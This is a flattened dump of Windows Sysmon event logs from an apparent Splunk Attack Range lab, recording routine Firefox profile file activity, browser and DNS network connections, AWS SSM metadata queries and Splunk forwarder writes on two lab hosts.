Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107387Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.226{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107386Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.222{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=997F43EF416E77F42FA1F7AC114353E0,SHA256=48DC5236AB56A7A9641E4A9578B8182025F544FDC2C38A7D865D25B86FB9CB33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107385Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.220{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=39EC7719DC5CBB592874DDAB91F0667A,SHA256=FEB2447DD6B6D3F01E780D842EE60C7F6F05D1A58B3FE29BA06CD34845E49845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107384Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.128{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107383Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.125{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107382Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.121{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=A1B9C446CDDB0553B1998DE1285E7CE9,SHA256=18B14FC60CD56F9994485584DDB2F5D150129DCBFC8579D127B499CE50B5D78B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107381Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.120{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=5D528ABE57C642B0F3502775955C3A8F,SHA256=82223DAECECC800FEA1D82AA405A0BB40C3DA010C263A874B7EEB46F168C8454,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107380Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:47.511{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51886-false169.254.169.254-80http 354300x8000000000000000107379Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:47.422{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51885-false169.254.169.254-80http 354300x8000000000000000107378Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:47.383{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51884-false169.254.169.254-80http 354300x8000000000000000107377Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:47.382{58E9C193-ACB6-615A-4300-00000000FC01}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51883-false169.254.169.254-80http 23542300x8000000000000000107376Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.070{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107375Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.068{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107374Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.062{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=A1A602C9BD1D183EB12B5E8F37243B72,SHA256=0F16BBB9BE65BCC9CCDA829B7672B98BE6A35540EED13870B7C2E63D4C167BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107373Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.058{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=A385AA5FA6F6A848C6C94798D8A92E00,SHA256=BA724B6392668C41490C3F7BBE52B55540018A48880EEAC25C7ABBE48C331F2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107448Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.542{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107447Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.542{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107446Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.473{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3142E7226697521C53DA405BE3337AC,SHA256=D2FA5A71430346C2633DDA1803E4F8367DB6FF8E12D3EA5D4016C4232FED9CB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107445Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.442{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=0C4FF9B6C720EF62B57DACE7990AAF66,SHA256=A11D736D0815A1CD2BC862FA41815FC0927514861CBFEAB0E46DB4764A823725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107444Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.373{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=98CBA1A24F9C828C2DF57CF77542D2F5,SHA256=6C2C3038DE9CACCD6B59D518715028D724876E8900F1CDB1E3269F3DD1C5E55B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083450Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:50.394{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96883BE003178655F37A4118520F1E5C,SHA256=4DB471839DB36F5126039ADE8C1B097C7EDC3D39EC50DD2166C0C9F9808C35D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083449Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:47.731{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50169-false10.0.1.12-8000- 23542300x8000000000000000107443Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.142{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107442Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.182{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local64234-false74.125.11.103fra15s42-in-f7.1e100.net443https 354300x8000000000000000107441Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.150{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64233- 354300x8000000000000000107440Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.148{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49179- 354300x8000000000000000107439Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.147{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52297- 354300x8000000000000000107438Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.033{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51895-false142.250.185.163fra16s51-in-f3.1e100.net80http 354300x8000000000000000107437Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.033{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49667- 354300x8000000000000000107436Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.031{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64167- 354300x8000000000000000107435Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.029{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49262- 354300x8000000000000000107434Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.018{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51894-false74.125.11.103fra15s42-in-f7.1e100.net443https 354300x8000000000000000107433Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.014{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51351- 354300x8000000000000000107432Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.005{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51893-false18.66.139.67-443https 354300x8000000000000000107431Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:49.004{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62900- 23542300x8000000000000000107456Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.638{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107455Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.575{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\security_state\data.safe.binMD5=05D7DA1AB1D0E7DCF322D99A11757C22,SHA256=AE5D4167636556AC182426CF78E734A6E18E732C4031466D58861D5C5F2F4870,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107454Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.507{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107453Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.507{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107452Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.454{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=2A02C0FD3AB9F5C7D112F4742584DA4F,SHA256=28AA5266EF20E2C20FEA6B8BFF6AAC2747044AF4CA72E01CEF2AD8C6728B82F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107451Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.438{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=76074AE852157A3F89F98B43595AD625,SHA256=2B6308AD2A1837008F66644F9EDDB59952D23AB59A8DFC78710037554BF210F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107450Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.391{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B24B1A25ED1DE3DF900D2E2885ED1B59,SHA256=47D72CE9D04CCC200C7D7E2175631144406310BDDAE67C3802ECD9834F02D809,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083451Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:51.394{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6A4914673FFC90285E5DED01FF9AA9,SHA256=9BC4814143A98BCD8DE86FE2D8B6D3133AAD9717521084909364774F1C81E530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107449Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.123{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\security_state\data.safe.binMD5=554B994142B00E82580C77F0A5F177C1,SHA256=94B4B128F8E30BDB92C86E80557F387F06D6EB733B3CD951EC288E5111A641E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107474Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.121{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51909-false65.9.66.14-443https 354300x8000000000000000107473Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.120{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51908-false65.9.66.14-443https 354300x8000000000000000107472Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.118{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51907-false65.9.66.14-443https 354300x8000000000000000107471Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.108{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51906-false65.9.66.14-443https 354300x8000000000000000107470Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.108{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51905-false65.9.66.14-443https 354300x8000000000000000107469Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.106{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51904-false65.9.66.14-443https 354300x8000000000000000107468Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.096{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60522- 354300x8000000000000000107467Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.087{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51903-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000107466Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.086{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51901-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000107465Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.086{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51899-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000107464Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.085{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51902-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000107463Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.085{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51900-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x8000000000000000107462Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.756{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51898-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 23542300x8000000000000000107461Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:52.397{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEA7EA30F303D8968E004878AC229EDB,SHA256=1399AFD68B140A29E86BAB467D4B94B22F7F7761B6BE327CE7608102278434DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083452Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:52.394{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79ED4C1EFFFA517B26566AD2C3671AE4,SHA256=ABBC067EFC9500D64E732B220FA54414E392C865F20E2659FB20CE083D5DF2C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107460Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:51.032{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-55784-true2001:7fd:0:0:0:0:0:1-53domain 354300x8000000000000000107459Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.896{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51897-false18.66.139.67-443https 354300x8000000000000000107458Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:50.792{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51896-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 